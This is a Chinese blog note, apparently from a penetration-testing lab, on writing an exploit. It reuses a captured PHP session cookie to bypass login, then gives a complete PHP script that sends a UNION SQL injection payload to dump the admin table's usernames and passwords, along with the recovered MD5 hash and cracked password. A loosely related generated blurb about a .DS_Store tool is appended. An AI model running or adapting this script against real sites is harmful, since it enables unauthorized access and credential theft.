渗透测试_需要验证的EXP编写

本文介绍了通过fsockopen函数实现PHP会话劫持,详细解析了如何绕过登录验证并利用SQL注入漏洞获取账号密码。通过构造payload并设置自定义HTTP请求,成功获取到管理员的账号(admin)和MD5加密后的密码(123456)。此外,还展示了如何编写exploit脚本来自动化这个过程。
摘要由CSDN通过智能技术生成

记一次笔记

fsockopen — 打开一个网络连接或者一个Unix套接字连接

参数:hostname:网址        port:端口        errstr:错误返回信息        timeout:超时时间

 

靶机登录界面

登录成功界面

如果不登录直接访问main.php的话,是有账号密码验证的,是进不去的

因为界面有session 进行验证

 h4pb2rtsfrsihh8h629emrm9s4

所以抓包直接把session放进去试试

 这里没有输入账号和密码,直接把session放进去了,直接登录成功

所以开始写exp脚本把~

<?php

#网址
$site="10.32.4.234";

#注入语句

$payload="article.php?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x3a,password,0x7e)%20from%20admin";

#session
$key ="PHPSESSID=pncn36ctuh4j6alpu9422ofhi1";

#自定义方法,参数为网址、构造的payload、session
function send_http($site,$payload,$key){

#调用php内置函数fsockopen
        $fp = fsockopen($site, 80, $errno, $errstr, 30);
        if (!$fp) {
                echo "$errstr ($errno)<br />\n";
        } else {

#抓包的内容
                $out = "GET /{$payload} HTTP/1.1\r\n";
                $out .= "Host:{$site} \r\n";
                $out .= "Connection: keep-alive\r\n\r\n";
                $out .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
                $out .="Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\n";
                $out .="Cookie:{$key}\r\n";
                fwrite($fp, $out);
                while (!feof($fp)) {
                        $resp .=  fgets($fp, 1024);
                }
                fclose($fp);
                return $resp;
        }
        
        
}

#调用函数
$html = send_http($site,$payload,$key);

if($html){

#正则匹配,如果有内容就返回数组为1的内容,否则抛错
        preg_match('/~(.*?)~/', $html,$m);
        if($m[1]){
                echo "[+]{$m[1]}[+]";
        }else{
                echo "[!]error[!]";
        }
        
}else{
                echo "[!]error[!]";
        }

?>

执行结果

账号:amdin

密码: e10adc3949ba59abbe56e057f20f883e

这里密码md5的,解密为:123456

跟我们sql手动注入的结果一样

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ds_store_exp-master是一种用于分析和利用.DS_Store文件的工具包。.DS_Store是Mac OS系统在文件夹中自动生成的隐藏文件,用于存储特定文件夹的自定义视图选项和元数据信息。ds_store_exp-master提供了一些功能,使用户能够查看和分析.DS_Store文件。 使用ds_store_exp-master的第一步是安装Python。在确保已经安装了python之后,可以从GitHub上下载ds_store_exp-master的源代码。然后,可以在命令行中导航到下载的文件所在的目录,并使用命令"python ds_store_exp.py"运行。 当程序运行后,用户会看到一个简单的命令行菜单,其中包含一些选项供用户选择。其中一个选项是"Extraction",允许用户从.DS_Store文件中提取有关文件夹和文件的信息。另一个选项是"Analysis",允许用户分析.DS_Store文件中的各种字段和标志位。用户还可以选择在指定的文件夹中创建自己的.DS_Store文件。 在提取信息或分析.DS_Store文件时,用户需要提供.DS_Store文件的路径。可以通过将.DS_Store文件拖放到命令行终端中,或手动输入.DS_Store文件的路径来完成。 使用ds_store_exp-master,您可以深入了解.DS_Store文件的内容,包括文件和文件夹的自定义视图选项、标签、图标位置等。这对于研究和理解.DS_Store文件的作用和功能非常有用。 总而言之,ds_store_exp-master是一个功能强大的工具包,可用于分析和利用.DS_Store文件。通过提供丰富的选项和功能,使用户能够深入了解.DS_Store文件的内容和功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值